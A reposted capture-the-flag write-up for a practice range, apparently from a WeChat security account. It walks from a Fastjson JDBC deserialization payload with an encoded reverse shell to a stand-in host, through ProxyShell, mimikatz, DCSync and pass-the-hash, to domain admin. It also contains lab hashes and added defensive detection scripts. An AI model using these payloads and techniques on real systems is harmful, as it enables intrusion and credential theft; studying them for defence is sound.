春秋云镜-exchange-WriteUp

admin · 2023-11-11 22:17:07 · 13 comments · 6287 characters · reading time 20 min 57 s

Disclaimer: the security tools and projects shared by this public account all come from the internet and are provided for security research and learning only. Anyone who uses them for other purposes bears full legal and joint liability; this has nothing to do with the tool authors or this account.





Range overview

Exchange is a medium-difficulty range. Completing it helps players understand proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement in internal penetration, deepens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The range has 4 flags, spread across different hosts.


Getting a foothold on the entry host

An nmap scan of the target IP shows 华夏ERP (jshERP) on port 8080. 华夏ERP has known historical vulnerabilities: unauthenticated access and Fastjson deserialization.

We can try Fastjson's MySQL JDBC deserialization chain.

https://github.com/fnmsd/MySQL_Fake_Server

config.json configuration:

{
  "config": {
    "ysoserialPath": "ysoserial-all.jar",
    "javaBinPath": "java",
    "fileOutputDir": "./fileOutput/",
    "displayFileContentOnScreen": true,
    "saveToFile": true
  },
  "fileread": {
    "win_ini": "c:\\windows\\win.ini",
    "win_hosts": "c:\\windows\\system32\\drivers\\etc\\hosts",
    "win": "c:\\windows\\",
    "linux_passwd": "/etc/passwd",
    "linux_hosts": "/etc/hosts",
    "index_php": "index.php",
    "ssrf": "https://www.baidu.com/",
    "__defaultFiles": ["/etc/hosts", "c:\\windows\\system32\\drivers\\etc\\hosts"]
  },
  "yso": {
    "Jdk7u21": ["Jdk7u21", "calc"],
    "CommonsCollections6": ["CommonsCollections6", "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNpcC84MDA5IDA+JjEK}|{base64,-d}|{bash,-i}"]
  }
}

Start the malicious MySQL server, then exploit the vulnerability through Burp:

{
  "name": {
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "vpsip",
    "portToConnectTo": 3306,
    "info": {
      "user": "CommonsCollections6",
      "password": "pass",
      "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
      "autoDeserialize": "true",
      "NUM_HOSTS": "1"
    }
  }
}

GET /a.css/../systemConfig/list?search=%7B%20%22name%22%3A%20%7B%20%22%40type%22%3A%20%22java.lang.AutoCloseable%22%2C%20%22%40type%22%3A%20%22com.mysql.jdbc.JDBC4Connection%22%2C%20%22hostToConnectTo%22%3A%20%22vpsip%22%2C%20%22portToConnectTo%22%3A%203306%2C%20%22info%22%3A%20%7B%20%22user%22%3A%20%22CommonsCollections6%22%2C%20%22password%22%3A%20%22pass%22%2C%20%22statementInterceptors%22%3A%20%22com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%20%22autoDeserialize%22%3A%20%22true%22%2C%20%22NUM_HOSTS%22%3A%20%221%22%20%7D%20%7D%20%7D&currentPage=1&pageSize=10 HTTP/1.1
Host: 47.92.212.159:8000
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.60
X-Requested-With: XMLHttpRequest
Referer: http://47.116.69.14/pages/manage/systemConfig.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5
Connection: close
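From the defender's side, the request above leaves a recognisable trace in the web server's access log: a dot-dot segment after a static-looking prefix (the authorisation bypass) and a JSON query parameter carrying an @type key together with MySQL JDBC connection properties (the deserialization gadget). The Python script below is an added example, not code from the original post or from any of the tools it uses; it scans constructed combined-format log lines for exactly those two traits and reports the client and findings. The log lines and client addresses are constructed, the parameter name search comes from the request above, and matching is done on the decoded text rather than with a strict JSON parse because Fastjson accepts input a strict parser might reject.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log request line: client, timestamp, "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A JSON "@type" key is what lets Fastjson choose a class; the JDBC connection class and the
# autoDeserialize / statementInterceptors properties are what turn that into deserialization.
TYPE_KEY_RE = re.compile(r'"@type"\s*:')
JDBC_GADGET_MARKERS = (
    "JDBC4Connection",
    "statementInterceptors",
    "ServerStatusDiffInterceptor",
    "autoDeserialize",
)


def analyse_target(target):
    """Return findings for one request target (path + query); an empty list means nothing suspicious."""
    findings = []
    parts = urlsplit(target)
    path = unquote(parts.path)
    # Authorisation-bypass pattern: a static-looking prefix followed by a dot-dot segment.
    if "/../" in path or path.endswith("/.."):
        findings.append("dot-dot segment in request path: " + path)
    # Inspect every query parameter as decoded text (parse_qs already URL-decodes values).
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if not TYPE_KEY_RE.search(value):
                continue
            hits = sorted(m for m in JDBC_GADGET_MARKERS if m in value)
            if hits:
                findings.append(f"Fastjson JDBC deserialization gadget in '{name}': " + ", ".join(hits))
            else:
                findings.append(f"Fastjson @type key in parameter '{name}'")
    return findings


def scan_log(lines):
    """Return (client ip, decoded path, findings) for every log line that triggers a finding."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        findings = analyse_target(m["target"])
        if findings:
            alerts.append((m["ip"], unquote(urlsplit(m["target"]).path), findings))
    return alerts


# Constructed sample log (documentation-range client addresses, not the range's real hosts).
# The third line carries the URL-encoded payload from the request above.
SAMPLE_LOG = [
    '198.51.100.12 - - [11/Nov/2023:22:10:01 +0800] "GET /login.html HTTP/1.1" 200 5662',
    '198.51.100.12 - - [11/Nov/2023:22:10:09 +0800] "GET /systemConfig/list?search=%7B%22name%22%3A%22smtp%22%7D&currentPage=1&pageSize=10 HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Nov/2023:22:17:07 +0800] "GET /a.css/../systemConfig/list?search='
    "%7B%20%22name%22%3A%20%7B%20%22%40type%22%3A%20%22java.lang.AutoCloseable%22%2C%20%22%40type%22%3A%20"
    "%22com.mysql.jdbc.JDBC4Connection%22%2C%20%22hostToConnectTo%22%3A%20%22vpsip%22%2C%20%22portToConnectTo%22%3A%20"
    "3306%2C%20%22info%22%3A%20%7B%20%22user%22%3A%20%22CommonsCollections6%22%2C%20%22password%22%3A%20%22pass%22%2C%20"
    "%22statementInterceptors%22%3A%20%22com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%20"
    "%22autoDeserialize%22%3A%20%22true%22%2C%20%22NUM_HOSTS%22%3A%20%221%22%20%7D%20%7D%20%7D"
    '&currentPage=1&pageSize=10 HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(ip, path)
        for finding in findings:
            print("  -", finding)
```

Only the third line is reported: the benign search for a configuration entry has no @type key and no dot-dot segment. Applying the same two checks in a WAF rule or at the reverse proxy is the cheap mitigation; the real fix is upgrading Fastjson and closing the static-suffix authorisation bypass.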


We get flag01: flag{1accd7bc-ec2f-4935-90f2-de68cd76dfa3}


Lateral movement inside the network

Upload fscan and scan the current /24 segment

curl http://vpsip:8001/fscan_amd64 --output fscan_amd64
chmod +x ./fscan_amd64
./fscan_amd64 -h 172.22.3.1/24

./fscan_amd64 -h 172.22.3.1/24
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.3.26 is alive
(icmp) Target 172.22.3.9 is alive
[*] Icmp alive hosts len is: 4
172.22.3.9:808 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.9:8172 open
172.22.3.12:8000 open
172.22.3.9:445 open
172.22.3.26:445 open
172.22.3.2:445 open
172.22.3.2:88 open
172.22.3.9:443 open
172.22.3.9:139 open
172.22.3.2:139 open
172.22.3.26:139 open
172.22.3.9:135 open
172.22.3.26:135 open
172.22.3.2:135 open
172.22.3.9:81 open
172.22.3.9:80 open
[*] alive ports len is: 18
start vulscan
[*] WebTitle: http://172.22.3.12 code:200 len:19813 title:lumia
[*] NetInfo:
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] NetBios: 172.22.3.2 [+]DC XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.3.26 XIAORANG\XIAORANG-PC
[*] 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] WebTitle: http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html
[*] NetBios: 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] WebTitle: http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle: http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle: https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
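A long fscan run is easier to act on as a host inventory, which is also what a blue team does when it reviews what a scanner like this would reveal about its own segment. The Python below is an added example, not part of the original write-up or of fscan: it parses an excerpt of the output above (the ip:port open, NetBios and WebTitle lines) into one record per host and derives the roles the author reads off by eye, namely that a host with Kerberos (88) or fscan's [+]DC marker is a domain controller and a host whose web title or redirect points at /owa/ is Exchange. The excerpt is a constructed copy of lines from the scan above; the role rules and the line formats are assumptions about fscan 1.8.x output.

```python
import re
from collections import defaultdict

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
# Line shapes from fscan output that the inventory uses (assumed from the run above).
OPEN_RE = re.compile(rf"^(?P<ip>{IP}):(?P<port>\d+) open$")
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios: (?P<ip>{IP}) (?P<rest>.+)$")
WEBTITLE_RE = re.compile(rf"^\[\*\] WebTitle: (?P<url>https?://(?P<ip>{IP})\S*) .*?title:(?P<title>.*)$")


def parse_fscan(lines):
    """Build {ip: {"ports": [...], "names": [...], "web": [...], "roles": set()}} from fscan output."""
    hosts = defaultdict(lambda: {"ports": set(), "names": [], "web": [], "roles": set()})
    for raw in lines:
        line = raw.strip()
        if m := OPEN_RE.match(line):
            hosts[m["ip"]]["ports"].add(int(m["port"]))
        elif m := NETBIOS_RE.match(line):
            hosts[m["ip"]]["names"].append(m["rest"].strip())
            if "[+]DC" in m["rest"]:  # fscan flags the domain controller it found over NetBIOS
                hosts[m["ip"]]["roles"].add("domain controller")
        elif m := WEBTITLE_RE.match(line):
            hosts[m["ip"]]["web"].append((m["url"], m["title"].strip()))
            if "/owa/" in m["url"] or "/owa/" in m["title"]:  # OWA redirect or logon page => Exchange
                hosts[m["ip"]]["roles"].add("exchange")
    for host in hosts.values():
        if 88 in host["ports"]:  # Kerberos is only served by domain controllers
            host["roles"].add("domain controller")
        if 445 in host["ports"]:
            host["roles"].add("smb")
        host["ports"] = sorted(host["ports"])
    return dict(hosts)


def report(hosts):
    """One summary line per host, most exposed (most open ports) first."""
    lines = []
    for ip, h in sorted(hosts.items(), key=lambda kv: -len(kv[1]["ports"])):
        roles = ", ".join(sorted(h["roles"])) or "-"
        lines.append(f"{ip:<14} ports={h['ports']} roles={roles}")
    return lines


# Constructed excerpt of the scan above, one line per fscan output line.
FSCAN_EXCERPT = """\
172.22.3.9:808 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.12:8000 open
172.22.3.9:445 open
172.22.3.26:445 open
172.22.3.2:445 open
172.22.3.2:88 open
172.22.3.9:443 open
172.22.3.2:139 open
172.22.3.26:139 open
172.22.3.2:135 open
[*] NetBios: 172.22.3.2 [+]DC XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.3.26 XIAORANG\\XIAORANG-PC
[*] NetBios: 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] WebTitle: https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
""".splitlines()

if __name__ == "__main__":
    for line in report(parse_fscan(FSCAN_EXCERPT)):
        print(line)
```

The same inventory, run against a scan of your own segment, is a quick check that SMB (445) and the Exchange admin endpoints are reachable only from where they should be.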

Tunnel into the internal network with frp

curl http://vpsip:8001/frpc --output frpc
curl http://vpsip:8001/frpc.ini --output frpc.ini
chmod +x ./frpc
nohup ./frpc -c frpc.ini &

The fscan results show that 172.22.3.9 is the Exchange server. We have no domain credentials yet, but we can try ProxyShell, which does not need any.

ProxyShell works: we add a domain user alice and add it to the local Administrators group on the Exchange host.

python3 proxyshell.py -t XIAORANG-EXC01.xiaorang.lab


RDP to the Exchange host as alice, then dump the credentials in lsass with mimikatz

XIAORANG-EXC01$/e95225f6e2b6b094e532db3a02811ee2
Zhangtong/22c7f81993e96ac83ac2f3f1903de8b4

We get flag02: flag{edb4d500-706f-4197-a33b-0ea8d79e3e44}


We just obtained the hash of the domain host XIAORANG-EXC01$. A domain machine account is a special kind of domain user and can authenticate to the domain in the same way. Use https://github.com/lzzbb/Adinfo to gather domain information

./Adinfo_darwin -d xiaorang.lab --dc 172.22.3.2 -u XIAORANG-EXC01$ -H e95225f6e2b6b094e532db3a02811ee2


The Exchange machine account is a member of the Exchange Windows Permissions group, and that group has WriteDACL over the domain object, so we can grant DCSync rights to the domain user Zhangtong whose hash mimikatz just gave us.

python3 Dcsync.py -dc XIAORANG-WIN16.xiaorang.lab -t 'CN=Zhangtong,CN=Users,DC=xiaorang,DC=lab' 'xiaorang\XIAORANG-EXC01$' -hashes :e95225f6e2b6b094e532db3a02811ee2


With Zhangtong granted DCSync rights, dump the domain hashes with secretsdump:

python3 secretsdump.py [email protected] -just-dc-user administrator -hashes :22c7f81993e96ac83ac2f3f1903de8b4
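The two steps just shown, granting Zhangtong replication rights and then pulling hashes, are both visible on the domain controller when directory-service auditing is enabled: the ACL write lands in Security event 5136 (attribute nTSecurityDescriptor on the domain object), and every replication request lands in event 4662 carrying the replication extended-right GUIDs in its Properties field. The Python below is an added detection example, not part of the original post. Events are constructed dictionaries shaped like the EventData fields of those two events; the DC allow-list and domain DN are lab-specific assumptions (in a real environment the allow-list is built from the Domain Controllers OU plus reviewed sync accounts such as an Azure AD Connect service account).

```python
import re

# Extended-right GUIDs that together allow directory replication (what DCSync needs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

# Lab assumptions: the only DC is XIAORANG-WIN16 and the domain root is DC=xiaorang,DC=lab.
DC_ACCOUNTS = {"XIAORANG-WIN16$"}
DOMAIN_DN = "DC=xiaorang,DC=lab"


def analyse_events(events, dc_accounts=DC_ACCOUNTS, domain_dn=DOMAIN_DN):
    """Return (kind, subject, detail) tuples for events matching the grant and the replication step."""
    alerts = []
    for ev in events:
        subject = f"{ev.get('SubjectDomainName', '?')}\\{ev.get('SubjectUserName', '?')}"
        if ev.get("EventID") == 4662:
            # 4662: an operation was performed on an object; Properties lists the control-access GUIDs.
            guids = set(GUID_RE.findall(ev.get("Properties", "").lower()))
            rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
            # Replication by a DC's own machine account is normal; by anyone else it is DCSync.
            if rights and ev.get("SubjectUserName", "").upper() not in dc_accounts:
                alerts.append(("dcsync", subject, ", ".join(rights)))
        elif ev.get("EventID") == 5136:
            # 5136: a directory object was modified; the DCSync grant rewrites the domain's security descriptor.
            if (ev.get("AttributeLDAPDisplayName", "").lower() == "ntsecuritydescriptor"
                    and ev.get("ObjectDN", "").lower() == domain_dn.lower()):
                alerts.append(("domain-acl-modified", subject, ev["ObjectDN"]))
    return alerts


# Constructed sample events shaped like the EventData of Security events 4662 and 5136.
SAMPLE_EVENTS = [
    {   # normal replication by the DC's own machine account: expected, not alerted
        "EventID": 4662, "SubjectUserName": "XIAORANG-WIN16$", "SubjectDomainName": "XIAORANG",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # the Exchange machine account rewriting the domain object's ACL (the Dcsync.py step)
        "EventID": 5136, "SubjectUserName": "XIAORANG-EXC01$", "SubjectDomainName": "XIAORANG",
        "ObjectDN": "DC=xiaorang,DC=lab", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
    },
    {   # Zhangtong requesting replication data (the secretsdump step)
        "EventID": 4662, "SubjectUserName": "Zhangtong", "SubjectDomainName": "XIAORANG",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                      "{89e95b76-444d-4c62-991a-0facbeda640c}",
    },
    {   # an ordinary object access by the same user with no replication right: not alerted
        "EventID": 4662, "SubjectUserName": "Zhangtong", "SubjectDomainName": "XIAORANG",
        "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
        "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
]

if __name__ == "__main__":
    for kind, subject, detail in analyse_events(SAMPLE_EVENTS):
        print(f"{kind:<20} {subject:<26} {detail}")
```

The ACL change is the earlier and quieter of the two signals, so it deserves its own alert rather than being treated as context for the DCSync one. Microsoft removed the domain-object WriteDACL from Exchange Windows Permissions in its 2019-era cumulative updates; if the group still holds it in your forest, fixing the ACL is the mitigation, and the detection only tells you when it has been used.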


Then connect with wmiexec using the domain administrator's hash:

python3 wmiexec.py [email protected] -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -codec gbk

On the DC we get flag04: flag{965bedbc-0311-4c9e-8931-4ecccd88469a}


The host 172.22.3.26 has not been touched yet. There is a secret.zip on Lumia's desktop

python3 smbclient.py xiaorang.lab/[email protected] -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb


After downloading it, opening the archive prompts for a password


Get Lumia's password hash

python3 secretsdump.py [email protected] -just-dc-user Lumia -hashes :22c7f81993e96ac83ac2f3f1903de8b4


We now have Lumia's hash but cannot recover the plaintext password. Use https://github.com/Jumbo-WJB/PTH_Exchange to pull Lumia's mailbox contents down from Exchange

python3 pthexchange.py --target https://172.22.3.9 --username Lumia --password "00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296" --action Download


There are two emails; the secret.zip password is in the phone list on the left


Crack the zip password with john

zip2john secret.zip > zip.sec
john zip.sec --format=pkzip --wordlist=phone.lst


The crack succeeds; extracting the archive gives flag03: flag{cf0c753c-233f-4729-8984-0746ea5878b7}



Originally published on the WeChat public account 猫蛋儿安全: 春秋云镜-exchange-WriteUp

Reposted on CN-SEC中文网 (keep this link when reposting): https://cn-sec.com/archives/2197449.html
